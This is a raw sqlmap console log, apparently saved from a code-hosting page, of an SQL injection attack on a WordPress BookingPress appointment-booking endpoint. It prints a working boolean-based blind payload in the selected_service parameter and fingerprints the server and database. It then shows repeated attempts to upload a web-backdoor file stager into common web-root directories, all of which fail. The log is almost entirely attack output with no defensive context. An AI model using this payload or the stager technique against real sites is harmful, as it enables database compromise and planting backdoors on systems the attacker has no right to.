92 lines
7.6 KiB
Plaintext
92 lines
7.6 KiB
Plaintext
___
|
|
__H__
|
|
___ ___[)]_____ ___ ___ {1.7#stable}
|
|
|_ -| . ["] | .'| . |
|
|
|___|_ [)]_|_|_|__,| _|
|
|
|_|V... |_| https://sqlmap.org
|
|
|
|
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
|
|
|
|
[*] starting @ 02:08:42 /2023-01-26/
|
|
|
|
[02:08:42] [INFO] parsing HTTP request from 'appointment.req'
|
|
[02:08:42] [WARNING] you did not provide the local path where Metasploit Framework is installed
|
|
[02:08:42] [WARNING] sqlmap is going to look for Metasploit Framework installation inside the environment path(s)
|
|
[02:08:42] [INFO] Metasploit Framework has been found installed in the '/usr/bin' path
|
|
[02:08:42] [WARNING] provided value for parameter 'appointment_data[selected_cat_name]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
|
|
[02:08:42] [WARNING] provided value for parameter 'appointment_data[customer_name]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
|
|
[02:08:42] [WARNING] provided value for parameter 'appointment_data[selected_payment_method]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
|
|
[02:08:42] [WARNING] provided value for parameter 'appointment_data[total_services]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
|
|
[02:08:42] [INFO] resuming back-end DBMS 'mysql'
|
|
[02:08:42] [INFO] testing connection to the target URL
|
|
sqlmap resumed the following injection point(s) from stored session:
|
|
---
|
|
Parameter: appointment_data[selected_service] (POST)
|
|
Type: boolean-based blind
|
|
Title: OR boolean-based blind - WHERE or HAVING clause
|
|
Payload: action=bookingpress_front_save_appointment_booking&appointment_data[selected_category]=1&appointment_data[selected_cat_name]=&appointment_data[selected_service]=-1434 OR 8507=8507&appointment_data[selected_service_name]=Startup meeting&appointment_data[selected_service_price]=$0.00&appointment_data[service_price_without_currency]=0&appointment_data[selected_date]=2023-01-27&appointment_data[selected_start_time]=12:00&appointment_data[selected_end_time]=12:30&appointment_data[customer_name]=&appointment_data[customer_firstname]=fname&appointment_data[customer_lastname]=lname&appointment_data[customer_phone]=12345678&appointment_data[customer_email]=email@example.com&appointment_data[appointment_note]=note&appointment_data[selected_payment_method]=&appointment_data[customer_phone_country]=BB&appointment_data[total_services]=&appointment_data[stime]=1674677898&appointment_data[spam_captcha]=xrv6WZBaomY7&_wpnonce=8db3188c79
|
|
---
|
|
[02:08:42] [INFO] the back-end DBMS is MySQL
|
|
web application technology: Nginx 1.18.0, PHP 8.0.24
|
|
back-end DBMS: MySQL 5 (MariaDB fork)
|
|
[02:08:42] [INFO] fingerprinting the back-end DBMS operating system
|
|
[02:08:42] [INFO] the back-end DBMS operating system is Linux
|
|
[02:08:42] [INFO] going to use a web backdoor to establish the tunnel
|
|
which web application language does the web server support?
|
|
[1] ASP
|
|
[2] ASPX
|
|
[3] JSP
|
|
[4] PHP (default)
|
|
> 4
|
|
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] Y
|
|
[02:08:43] [WARNING] unable to automatically retrieve the web server document root
|
|
what do you want to use for writable directory?
|
|
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)
|
|
[2] custom location(s)
|
|
[3] custom directory list file
|
|
[4] brute force search
|
|
> 1
|
|
[02:08:43] [WARNING] unable to automatically parse any web server path
|
|
[02:08:43] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
|
|
[02:08:43] [WARNING] unable to upload the file stager on '/var/www/'
|
|
[02:08:43] [INFO] trying to upload the file stager on '/var/www/wp-admin/' via LIMIT 'LINES TERMINATED BY' method
|
|
[02:08:44] [WARNING] unable to upload the file stager on '/var/www/wp-admin/'
|
|
[02:08:44] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method
|
|
[02:08:45] [WARNING] unable to upload the file stager on '/var/www/html/'
|
|
[02:08:45] [INFO] trying to upload the file stager on '/var/www/html/wp-admin/' via LIMIT 'LINES TERMINATED BY' method
|
|
[02:08:45] [WARNING] unable to upload the file stager on '/var/www/html/wp-admin/'
|
|
[02:08:45] [INFO] trying to upload the file stager on '/var/www/htdocs/' via LIMIT 'LINES TERMINATED BY' method
|
|
[02:08:46] [WARNING] unable to upload the file stager on '/var/www/htdocs/'
|
|
[02:08:46] [INFO] trying to upload the file stager on '/var/www/htdocs/wp-admin/' via LIMIT 'LINES TERMINATED BY' method
|
|
[02:08:47] [WARNING] unable to upload the file stager on '/var/www/htdocs/wp-admin/'
|
|
[02:08:47] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/' via LIMIT 'LINES TERMINATED BY' method
|
|
[02:08:47] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/'
|
|
[02:08:47] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/wp-admin/' via LIMIT 'LINES TERMINATED BY' method
|
|
[02:08:48] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/wp-admin/'
|
|
[02:08:48] [INFO] trying to upload the file stager on '/usr/local/www/data/' via LIMIT 'LINES TERMINATED BY' method
|
|
[02:08:49] [WARNING] unable to upload the file stager on '/usr/local/www/data/'
|
|
[02:08:49] [INFO] trying to upload the file stager on '/usr/local/www/data/wp-admin/' via LIMIT 'LINES TERMINATED BY' method
|
|
[02:08:50] [WARNING] unable to upload the file stager on '/usr/local/www/data/wp-admin/'
|
|
[02:08:50] [INFO] trying to upload the file stager on '/var/apache2/htdocs/' via LIMIT 'LINES TERMINATED BY' method
|
|
[02:08:50] [WARNING] unable to upload the file stager on '/var/apache2/htdocs/'
|
|
[02:08:50] [INFO] trying to upload the file stager on '/var/apache2/htdocs/wp-admin/' via LIMIT 'LINES TERMINATED BY' method
|
|
[02:08:51] [WARNING] unable to upload the file stager on '/var/apache2/htdocs/wp-admin/'
|
|
[02:08:51] [INFO] trying to upload the file stager on '/var/www/nginx-default/' via LIMIT 'LINES TERMINATED BY' method
|
|
[02:08:52] [WARNING] unable to upload the file stager on '/var/www/nginx-default/'
|
|
[02:08:52] [INFO] trying to upload the file stager on '/var/www/nginx-default/wp-admin/' via LIMIT 'LINES TERMINATED BY' method
|
|
[02:08:52] [WARNING] unable to upload the file stager on '/var/www/nginx-default/wp-admin/'
|
|
[02:08:52] [INFO] trying to upload the file stager on '/srv/www/htdocs/' via LIMIT 'LINES TERMINATED BY' method
|
|
[02:08:53] [WARNING] unable to upload the file stager on '/srv/www/htdocs/'
|
|
[02:08:53] [INFO] trying to upload the file stager on '/srv/www/htdocs/wp-admin/' via LIMIT 'LINES TERMINATED BY' method
|
|
[02:08:54] [WARNING] unable to upload the file stager on '/srv/www/htdocs/wp-admin/'
|
|
[02:08:54] [INFO] trying to upload the file stager on '/usr/local/var/www/' via LIMIT 'LINES TERMINATED BY' method
|
|
[02:08:54] [WARNING] unable to upload the file stager on '/usr/local/var/www/'
|
|
[02:08:54] [INFO] trying to upload the file stager on '/usr/local/var/www/wp-admin/' via LIMIT 'LINES TERMINATED BY' method
|
|
[02:08:55] [WARNING] unable to upload the file stager on '/usr/local/var/www/wp-admin/'
|
|
[02:08:55] [CRITICAL] unable to prompt for an out-of-band session
|
|
[02:08:55] [WARNING] HTTP error codes detected during run:
|
|
500 (Internal Server Error) - 20 times, 404 (Not Found) - 86 times, 400 (Bad Request) - 1 times
|
|
|
|
[*] ending @ 02:08:55 /2023-01-26/
|
|
|